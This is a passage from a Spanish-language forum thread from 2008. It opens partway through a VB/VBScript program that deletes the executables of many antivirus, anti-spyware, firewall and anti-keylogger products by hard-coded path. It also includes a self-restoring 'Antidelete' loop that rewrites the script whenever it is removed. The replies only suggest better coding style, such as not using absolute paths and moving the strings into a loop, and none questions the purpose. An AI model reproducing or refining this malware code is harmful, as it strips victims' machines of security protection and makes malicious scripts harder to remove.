Kill "C:\Archivos de programa\McAfee\Common Framework\UdaterUI.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\McTray.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\FrameworkService.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\Mcshield.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\VsTskMgr.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgcc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgemc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avginet.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgw.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgv.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Watch.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\alert.wav"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\filespecs.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\lspexplorer.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\Vx2Cleaner.dll"
Kill "C:\Archivos de programa\SpyBro\SpyBro.exe"
Kill "C:\Archivos de programa\SpyBro\nospylauncher.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvclt.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdoctor.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdsvc.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swcntaux.exe"
Kill "C:\Archivos de programa\Spyware Doctor\sdinvoker.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvctl.exe"
Kill "C:\Archivos de programa\Spyware Doctor\refdb.bin"
Kill "C:\Archivos de programa\xp-AntiSpy\xp-AntiSpy.exe"
Kill "C:\Archivos de programa\Ashampoo\Ashampoo FireWall\FireWall.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpf.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cmdagent.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpfsubmit.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\crashrep.exe"
Kill "C:\Archivos de programa\RootKit Hook Analyzer\hookAnalyzer.exe"
Kill "C:\Archivos de programa\Anti-keylogger\Anti-keylogger.exe"
Kill "C:\Archivos de programa\ATS2\ats.exe"
Kill "C:\Archivos de programa\ATS2\d1.exe"
Kill "C:\Archivos de programa\ATS2\sysinfo.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\Mcshield.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\VsTskMgr.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\SHSTAT.EXE"
End Sub


Function Antidelete()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function

Basado en código de Hendrix y Octalh
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.

Hans el Topo

#1
2 Enero 2008, 21:13 PM
de primeras y a simple vista diría que eso de poner rutas absolutas mal

utiliza variables de sistema para encontrar las ubicaciones o busca la ruta de los programas en el registro
 

corax

#2
2 Enero 2008, 21:23 PM
ammm... ok, hans. Gracias por el consejo, buscaré cómo hacerlo. Como ya he dicho, estoy dando mis primeros pasos en el mundo de la programación, y la verdad es que no puedo dedicarle todo el tiempo que quisiera a leer manuales de VB. Se agradecen todas las sugerencias. ;)
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.

byebye

#3
3 Enero 2008, 13:18 PM
y para migusto tanta repeticion de codigo solo hce que marear a la hora de leer. mete los strings necesarios en un fichero, depues lees cadena por cadena lo que necesites y en un solo bucle te quitas un monton de lineas y a la hora de leer esta mas ordenado.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario